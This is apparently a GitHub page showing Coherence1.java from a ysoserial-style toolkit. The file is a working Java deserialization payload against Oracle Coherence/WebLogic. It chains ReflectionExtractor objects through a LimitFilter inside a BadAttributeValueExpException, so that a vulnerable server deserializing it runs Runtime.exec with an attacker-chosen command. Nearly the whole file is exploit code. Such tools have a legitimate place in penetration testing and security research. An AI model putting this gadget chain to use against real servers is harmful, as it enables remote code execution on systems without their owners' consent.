-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCoherence1.java
More file actions
98 lines (79 loc) · 4.38 KB
/
Coherence1.java
File metadata and controls
98 lines (79 loc) · 4.38 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
package ysoserial.payloads;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.PayloadRunner;
import javax.management.BadAttributeValueExpException;
import java.io.File;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.URL;
import java.net.URLClassLoader;
/**
* @Date: 2021/7/26 5:18 pm
* @Version: 1.0
*/
@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"oracle coherence:oracle coherence:dynamic"})
@Authors({Authors.BEARCAT})
public class Coherence1 implements ObjectPayload<Object>{
@Override
public Object getObject(String command) throws Exception {
String[] cmd = command.split("\\@");
String relyJar = null;
if (cmd[0].toLowerCase().startsWith("rely_jar:")) {
relyJar = cmd[0].substring(cmd[0].indexOf(":") + 1);
} else {
throw new IllegalArgumentException("Command format is: [rely_jar]:/coherenceDir/coherence_weblogic12.1.3.0.0.jar@open /System/Applications/Calculator.app");
}
File file = new File(relyJar);
URL url = file.toURI().toURL();
ClassLoader loader = new URLClassLoader(new URL[]{url});
Class<?> classReflectionExtractor = loader.loadClass("com.tangosol.util.extractor.ReflectionExtractor");
Class<?> classChainedExtractor = loader.loadClass("com.tangosol.util.extractor.ChainedExtractor");
Class<?> classLimitFilter = loader.loadClass("com.tangosol.util.filter.LimitFilter");
Class<?> classValueExtractor = loader.loadClass("com.tangosol.util.ValueExtractor");
// Runtime.class.getRuntime()
Constructor<?> constructorReflectionExtractor1 = classReflectionExtractor.getConstructor(String.class, Object[].class);
Object extractor1 = constructorReflectionExtractor1.newInstance("getMethod", new Object[]{"getRuntime", new Class[0]});
// get invoke() to execute exec()
Constructor<?> constructorReflectionExtractor2 = classReflectionExtractor.getConstructor(String.class, Object[].class);
Object extractor2 = constructorReflectionExtractor2.newInstance("invoke", new Object[]{null, new Object[0]});
// invoke("exec","calc")
Constructor<?> constructorReflectionExtractor3 = classReflectionExtractor.getConstructor(String.class, Object[].class);
Object extractor3 = constructorReflectionExtractor3.newInstance("exec", new Object[]{cmd[1]});
Object arrays = Array.newInstance(classReflectionExtractor, 3);
Array.set(arrays, 0, extractor1);
Array.set(arrays, 1, extractor2);
Array.set(arrays, 2, extractor3);
Object chainedExtractor = null;
Constructor<?>[] constructorClassChainedExtractor = classChainedExtractor.getConstructors();
for (Constructor<?> constructor:constructorClassChainedExtractor){
if(constructor.toString().equalsIgnoreCase("public com.tangosol.util.extractor.ChainedExtractor(com.tangosol.util.ValueExtractor[])")){
chainedExtractor = constructor.newInstance(arrays);
}
}
//set m_comparator
Object limitFilter = classLimitFilter.newInstance();
Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
m_comparator.setAccessible(true);
m_comparator.set(limitFilter, chainedExtractor);
//set m_oAnchorTop
Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
m_oAnchorTop.setAccessible(true);
m_oAnchorTop.set(limitFilter, Runtime.class);
/*
BadAttributeValueExpException toString()
For jdk8u76 or above, the following versions do not have the BadAttributeValueExpException#readObject() method.
https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b3a8b4ed36974#diff-f89b1641c408b60efe29ee513b3d22ffR70
*/
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
field.setAccessible(true);
field.set(badAttributeValueExpException, limitFilter);
return badAttributeValueExpException;
}
public static void main(String[] args) throws Exception{
PayloadRunner.run(Coherence1.class,args);
}
}